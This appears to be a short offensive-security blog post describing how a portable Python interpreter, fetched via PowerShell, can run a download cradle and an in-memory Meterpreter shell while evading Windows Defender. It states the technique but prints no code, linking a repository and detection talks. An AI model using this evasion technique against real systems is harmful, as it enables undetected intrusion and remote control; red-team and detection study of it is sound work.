Forget compiling payloads and operating on disk — this post demonstrates the use of Python’s portable interpreter for in-memory malware deployment, even when the language isn’t installed on the host.
Python is a well known language with an infinite number of legitimate uses inside an organization. Through the use of Python’s portable, or embedded, package we can download a single .zip file and gain access to the python.exe interpreter without any installation required by the user.
Additionally, python.exe is a signed binary with a high reputation score, making it unlikely to be blocked. This provides a perfect vehicle for execution of a C2 beacon, or other payload, while on offensive security engagements.
The following video demonstrates PowerShell being used to download and extract a portable Python interpreter. Once on disk, a download cradle is used to retrieve the payload and execute a meterpreter shell in memory — bypassing the latest version of Windows Defender and other endpoint security solutions:
Payload source, PowerShell commands, and Python download cradle are available at github.com/m8sec/OffsecDev
More information on this technique, and potential areas of detection, checkout Diago Capriotti’s Pyramid project or his DefCon Adversary Village talk: Python vs Modern Defenses!
Thanks for reading and watching. Find out more about me at m8sec.dev and follow for more modern evasion tactics!
Disclaimer: All content is provided for educational purposes only. Author is not responsible for use of information. Never test against systems you don’t own or have explicit permission.
